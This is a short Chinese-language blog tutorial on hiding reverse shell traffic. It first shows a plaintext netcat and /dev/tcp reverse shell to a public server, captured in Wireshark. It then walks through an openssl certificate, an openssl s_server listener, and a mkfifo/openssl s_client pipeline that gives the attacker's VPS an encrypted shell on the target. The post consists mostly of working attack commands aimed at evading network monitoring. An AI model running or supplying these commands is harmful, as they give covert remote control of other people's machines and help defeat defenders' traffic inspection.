发布于2022年11月4日3年前 环境说明公网服务器一台kali (内网)简单的测试在公网服务器执行命令 nc -lvvp 4444kali中执行命令 -i >& /dev/tcp/公网ip/5555 0>&1启动Wireshark开启抓包,分析流量。测试我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。我们可以清楚的看到,终端流量是通过明文传送。那么如何保证安全呢,这需要我们对明文流量加密处理。openssl加密传输第一步,在vps上生成SSL证书的公钥/私钥对openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes第二步,在VPS监听反弹shellopenssl s_server -quiet -key key.pem -cert cert.pem -port 4433第三步,在目标上用openssl加密反弹shell的流量mkfifo /tmp/s;/bin/ -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s流量已经被加密。 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/1385.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见